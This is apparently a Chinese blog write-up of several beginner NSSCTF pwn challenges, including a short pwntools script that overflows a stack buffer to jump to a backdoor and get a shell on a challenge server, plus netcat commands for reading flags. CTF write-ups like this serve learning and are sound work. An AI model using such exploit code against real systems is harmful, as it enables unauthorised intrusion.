NSSCTF(PWN)

[SWPUCTF 2021 新生赛]nc签到

题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag

[SWPUCTF 2021 新生赛]gift_pwn

查看main函数,发现了vuln,双击进入

看到read,发现这里涉及典型的栈溢出

shift + F12 我们发现这道题有/bin/sh

ctrl + X 找到binsh地址

发现system和binsh

使用checksec我们发现这个文件是64位的

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28028')
#io = process('/home/xp/tm/bin/1')
padding = b'a'*(0x10+0x8)
door = 0x4005b6
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

[LitCTF 2023]只需要nc一下~

这道题没有给附件,我们就只能nc一下看看

我们发现这里直接cat flag是不行的

ls一下,我们发现有两个文件,cat看看

一开始还以为直接给了flag,试了发现是错的,看到下面这行,run这个代码就能得到flag

输入echo $FLAG 得到了flag

[NISACTF 2022]ReorPwn?

使用checksec查看文件,发现这题全开了,恐怖如斯进入IDA看看怎么个事

查看main发现fun点开看看

没有发现栈溢出

发现这段代码好像是反过来的,本人本着试试就逝世的态度用了cat flag 反过来打galf tac

得到了flag

[SWPUCTF 2022 新生赛]Does your nc work?

一道简单的签到题,只要nc就行,就是目录有点多,慢慢找就行


得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值